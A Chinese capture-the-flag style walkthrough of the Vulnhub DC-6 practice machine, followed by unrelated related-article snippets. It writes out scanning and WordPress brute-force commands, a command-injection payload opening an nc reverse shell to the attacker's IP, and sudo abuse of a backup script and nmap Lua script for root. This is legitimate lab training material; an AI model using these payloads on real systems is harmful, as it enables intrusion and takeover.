Vulnhub靶场案例渗透[6]- DC6

devtools/2024/10/15 15:20:10/

文章目录

  • 1. 靶场搭建
  • 2. 信息收集
    • 2.1 确定靶机ip
    • 2.2 主机信息收集
    • 2.3 主机目录扫描
    • 2.4 网站用户名和密码爆破
  • 3. 反弹shell
  • 4. 提权

1. 靶场搭建

靶场源地址

检验下载文件的检验码,对比没问题使用vmware打开


# windwos 命令
Get-FileHash <filePath> -Algorithm MD5
# linux
md5sum filepath

2. 信息收集

2.1 确定靶机ip

根据虚拟机网络适配器模式,确定靶机所在网段。使用nmap进行网段存活主机,排除法确定靶机ip.

nmap -sn 192.168.6.100/24

1728460476155.png
通过排除法确定靶机ip为192.168.6.101

2.2 主机信息收集

通过nmap探测靶机开放端口和端口对应服务

nmap -Ap 1-65535  192.168.6.101

e58f0a7d-9386-4492-9e53-abe16de8b184.jpeg
确定开放端口:

  • 22:ssh服务
  • 80: http服务

访问http://192.168.6.101时,url自动重定向到http://wordy, 修改/etc/hosts添加主机名和ip的映射.成功访问,发现是wordpress框架。

2.3 主机目录扫描

# 目录扫描
dirsearch -u http://wordy

找到登录页面地址,http://wordy/wp-login.php
3dba2ab7-a173-4ff7-a0a7-5bd4c21d6859.jpeg

2.4 网站用户名和密码爆破

这个靶场和dc2靶场使用相同的框架,接下来处理和dc-2靶场差不多方法获取用户名,发现成功获取到用户,加上靶场原页面提供了密码字典的线索,直接进行爆破.可以参考之前的文章DC-2靶场

# 获取网站用户名
wpscan --url http://wordy -e u 
# 爆破
gunzip /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan --url http://wordy -e u -P passsword.txt

d175f13f-585e-4052-8679-8c31c0ddeec1.jpeg

成功获取到账号密码
2708e77c-1556-4394-8cbf-ed27b85bda2d.jpeg

3. 反弹shell

登录成功之后,发现后台存在图中可以执行命令。这里输入框长度有限制,可以直接使用浏览器工具修改输入框的最大长度。
0ead5b13-7cb2-4950-8ff1-c01fe54823b9.jpeg

85f6da03-9a16-42f2-8981-6403dc407b5e.jpeg

# kali中执行
nc -lvp 8888
# 输入框中输入
127.0.0.1|nc 192.168.6.106 8888  -e /bin/bash

反弹shell成功,执行python代码创建一个伪终端,提高交互.
7ebc3204-6a85-4f77-b382-b83fc519550e.jpeg

# 创建一个伪终端,提高命令窗口交互
python -c 'import pty; pty.spawn("/bin/bash")'

4. 提权

获取shell之后,在`/home/mark/stuff/things-to-do.txt中发现graham的用户账号密码.然后使用ssh进行登录

b63ad010-cd92-4264-9d79-22bdf5bc51e7.jpeg
`

graphm登录成功之后,执行sudo -l发现graphm可以使用sudo 以jens身份执行脚本。并且graphm有backups.sh的修改权限。

da92cbfe-c897-4714-9c6f-ee8d622f9061.jpeg

使用以下命令获取jens的权限,成功切换至jens身份.

echo "/bin/bash" > /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh

4e5d9170-075b-48cc-b414-941e33073aa3.jpeg

执行sudo -l,查看sudo权限,发现当前用户可以无密码以root身份执行nmap。尝试使用namp进行提权。

ede72fd1-0851-4bf2-b807-b853b793b71a.jpeg

vim test.lua
# 在lua脚本中输入
os.execute("/bin/bash")
sudo nmap --script test.lua

成功获取root权限.
99339444-e5ec-4841-a5ea-828ab1fe5fa2.jpeg

获取目标flag内容

7a03b4d2-41fb-437c-925e-be733d610027.jpeg


http://www.ppmy.cn/devtools/126216.html

相关文章

Spring Boot的实用内置功能详解

Spring Boot作为一款备受欢迎的Java框架&#xff0c;以其简洁、高效和易用的特点&#xff0c;赢得了广大开发者的青睐。其内置的多种功能更是为开发者提供了极大的便利&#xff0c;本文将详细介绍Spring Boot中记录请求数据、请求/响应包装器、特殊的过滤器Filter以及Controlle…

FFmpeg的简单使用【Windows】--- 视频混剪+添加背景音乐

一、功能描述 点击背景音乐区域的【选择文件】按钮&#xff0c;选择音频文件并将其上传到服务器&#xff0c;上传成功后会将其存储的位置路径返回。 然后&#xff0c;点击要处理视频区域的【选择文件】按钮选择要进行混剪的视频素材&#xff08;1-10个&#xff09;。 以上两…

C语言语法练习20题(变量、输入输出、表达式与顺序语句)

题目1&#xff1a;A B 题目链接 输入两个整数&#xff0c;求这两个整数的和是多少。 输入格式 输入两个整数A, B&#xff0c;用空格隔开。 输出格式 输出一个整数&#xff0c;表示这两个数的和。 数据范围 0 ≤ A, B ≤ 10^8 输入样例 3 4输出样例 7解答&#xff0…

深入理解Transformer的笔记记录(精简版本)NNLM → Word2Vec

文章的整体介绍顺序为: NNLM → Word2Vec → Seq2Seq → Seq2Seq with Attention → Transformer → Elmo → GPT → BERT 自然语言处理相关任务中要将自然语言交给机器学习中的算法来处理,通常需要将语言数学化,因为计算机机器只认数学符号。向量是人把自然界的东西抽象出…

【华为HCIP实战课程十二】OSPF网络中1类2类LSA SPF详解,网络工程师

一、OSPF 1类LSA详解 1、通告者(产生LSA的设备):任何一台设备都会产生1类LSA 2、通告的范围:区域内部 3、功能和内容:产生拓扑信息和路由信息 LSA是OSPF链路状态信息的载体 4、每台OSPF路由器使用一条Router-LSA描述本区域内的链路状态信息 Type :LSA类型,Router-L…

C语言笔记 13

初见函数 求素数的和 #include <stdio.h>int main() {int m,n;int sum 0;int cnt 0;int i;scanf("%d %d", &m, &n);// m10,n31;if( m1) m2;for( im; i<n; i ) {int isPrime 1;int k;for ( k2; k<i-1; k ) {if ( i%k 0 ) {isPrime 0;break;…

Patroni配置3-环境变量配置设置

目录 全局/通用 Log Citus Consul Etcd Etcdv3 ZooKeeper Exhibitor Raft&#xff08;已弃用&#xff09; PostgreSQL REST API CTL 环境配置设置 可以通过系统环境变量覆盖Patroni配置文件中定义的一些配置参数。本文档列出了Patroni处理的所有环境变量。通过这些…

mysql-数据库的操作

目录 认识数据库的基本操作 1、创建数据库 &#xff08;1&#xff09;校验集、编码集 &#xff08;2&#xff09;指定字符集和校验集创建数据库 2、展示所建立的数据库&#xff1a; 3、查看自己当前数据库&#xff1a; 4、修改数据库 5、删除数据库 6、库的备份与恢复…